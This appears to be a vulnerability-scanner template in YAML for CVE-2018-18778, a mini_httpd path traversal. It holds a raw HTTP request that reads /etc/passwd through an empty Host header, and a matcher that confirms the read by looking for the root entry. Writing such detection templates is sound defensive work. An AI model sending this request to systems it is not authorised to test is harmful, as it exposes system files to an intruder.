33 lines
711 B
YAML
33 lines
711 B
YAML
id: CVE-2018-18778
|
|
|
|
info:
|
|
name: mini_httpd Path Traversal
|
|
author: dhiyaneshDK
|
|
severity: medium
|
|
description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
|
|
reference:
|
|
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2018-18778
|
|
cwe-id: CWE-200
|
|
tags: cve,cve2018,lfi
|
|
|
|
requests:
|
|
- raw:
|
|
- |+
|
|
GET /etc/passwd HTTP/1.1
|
|
Host:
|
|
|
|
unsafe: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|